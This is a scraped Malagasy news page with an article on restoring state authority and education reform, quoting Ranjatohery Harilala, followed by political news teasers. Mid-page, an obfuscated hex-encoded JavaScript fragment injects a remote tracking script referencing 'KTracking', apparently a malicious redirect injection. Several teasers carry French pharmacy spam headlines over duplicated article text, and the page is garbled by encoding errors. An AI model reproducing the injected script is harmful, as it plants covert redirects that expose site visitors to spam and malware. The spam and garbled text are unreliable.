logo

Hasina��ny fahefam-panjakana: Mila averina haingana, hoy Ranjatohery Harilala

Ny famerenana haingana ny hasina��ny fahefam-panjakana mba hisy dikany hoe misy fanjakana afaka
mampihatra ny lalana velona eto ary manana ny sazy tandrify izany no vahaolana amina��izao zava-
misy eto amina��ny firenena izao, hoy ny mpanabe no sady mpandinika tantara, Ranjatohery Harilala.
Ilaina, hoy izy, ny fanabeazana ny olona mba hiorina amina��ny fototra maha malagasy ka ahafahany
mahafantatra izay ilainy hampandroso ana��i Madagasikara. Ezaka mitohy izany, raha ny nambarany, fa
tsy vita 1 na 2 andro. Ny havaozina amina��ny fanabeazana mifototra amina��ny fananana tanjona
kendrena isika, hoy izy, fa tsy misy politikam-panabeazana mirindra eto. Ilana fifandaminana
haingana kosa ny tontolo ifaneraserana eto na eo amina��ny lafiny politika io na toekarena mba tsy
hisiana��ny zara-vilana toy izay hita eo amina��ny resaka fitrandrahana, ohatra.
Simbana��ny fahantrana ny toe-tsaina
Hita ho simbana��ny fahantrana, hoy hatrany ny tenany, ny toetsika na ara-tsaina izany na vatana, hany
ka tonga amina��ny fanekena hoe tsy misy azoa tao intsony fa aleo mizatra. Ilaina harenina amina��ny
alalana��ny fanabeazana, hoy izy, io toe-tsaina io, ary manana anjara toerana betsaka amina��izany ny
serasera satria tsy ampy falalana hisafidy ny olona. Ny Ntaolo, hoy izy, namarana ny teniny, dia nahay
nampianatra nanao kajy an-kandrina nefa tsy nisy sekoly hoe nampianarana ana��izany fa dia fotsiny
hoe a�? Tsindrian-telo toka-maha 10.a�? Nampianarina nanao kivoiboitra ny tovolahy mba hahafantarany
ny tokony ho fitodiky ny trano rehefa ahorina. Ny vehivavy nampianarina namantatra ravinkazo
satria ho mpitsabo ny ankohonany. Nisy antony avokoa, hoy izy, matoa natokana ho ana��ny ankizy ny
fanorontelo, ho ana��ny vehivavy ny fanorondimy ary ho ana��ny lehilahy ny fanorontsivy sy
fanorondroambinifolo.
Itsimanizina

\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x70\x72\x6F\x74\x6F\x63\x6F\x6C","\x68\x74\x74\x70\x73\x3A","\x69\x6E\x64\x65\x78\x4F\x66","\x52\x5F\x50\x41\x54\x48","\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E"];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Manda ho an’ny firaisankinam-pirenena: « Tafita ny fanilo. »

Ny famerenana haingana ny hasina��ny fahefam-panjakana mba hisy dikany hoe misy fanjakana afakamampihatra ny lalana velona eto ary manana ny sazy tandrify izany no vahaolana amina��izao zava-misy eto amina��ny firenena izao, hoy ny mpanabe no sady mpandinika tantara, Ranjatohery Harilala.Ilaina, hoy izy, ny fanabeazana ny olona mba hiorina amina��ny fototra maha malagasy ka ahafahanymahafantatra izay […]

KMFCNOE: a�?Aleo hezahana ho tratra ilay isana��ny mpifidy 10 tapitrisa.a�?

8 andro sisa dia higadona ilay antsoina hoe "taom-pifidianana", araka izay namaritan'ny vaomiera mahaleontena misahana ny fifidianana na CENI azy. Nampanantena ny teo anivon'ity rafitra ity fa hanao ny ezaka rehetra hampangarahara ny fifidianana rehetra ho avy eo. Etsy ankilan'izay kosa ny KMFCNOE dia mikarakara fikaonan-doha goavana hametrahana paikady hahafahana manara-maso izany sy hanabeazana ireo mpifidy.

Teza : Mila omena hasina ny Fokonolona amina�� ny Fampandrosoana

Foto-kevitra nijoroana�� ny antoko Teza hatramina�� izay ny fanomezan-danja ny fokonolona. Araka ny nambaran-dRakotoamboa Jean Louis,Filoha nasionalina�� ny antoko Teza fa A� mila omen-kasina ary lanja manokana mihitsy ny fokonolona manerana ana�� i Madagasikara amina�� ny fampandrosoana ny Firenena A�.

Ady amina�� ny kolikoly : Tsy mahomby i Madagasikara

Saro-toerana ny fampiharana ny ady amina��ny kolikoly eto Madagasikara. Nisy anefa ny fifanaovan-tsonia marobe notanterahina��ny firenentsika iadiana momba ity fositra manimba ny hoavim-pirenena itya��

Tantara

Literatiora

Vakoka velona

Periactin moins cher où acheter – livraison garantie

Ny famerenana haingana ny hasina��ny fahefam-panjakana mba hisy dikany hoe misy fanjakana afakamampihatra ny lalana velona eto ary manana ny sazy tandrify izany no vahaolana amina��izao zava-misy eto amina��ny firenena izao, hoy ny mpanabe no sady mpandinika tantara, Ranjatohery Harilala.Ilaina, hoy izy, ny fanabeazana ny olona mba hiorina amina��ny fototra maha malagasy ka ahafahanymahafantatra izay […]

Obtenir des Sildenafil Citrate pas cher – Livraison Gratuite

Ny famerenana haingana ny hasina��ny fahefam-panjakana mba hisy dikany hoe misy fanjakana afakamampihatra ny lalana velona eto ary manana ny sazy tandrify izany no vahaolana amina��izao zava-misy eto amina��ny firenena izao, hoy ny mpanabe no sady mpandinika tantara, Ranjatohery Harilala.Ilaina, hoy izy, ny fanabeazana ny olona mba hiorina amina��ny fototra maha malagasy ka ahafahanymahafantatra izay […]

Meilleure pharmacie en ligne pour les Doxycycline / Économisez temps et coûts / Payer Par BitCoin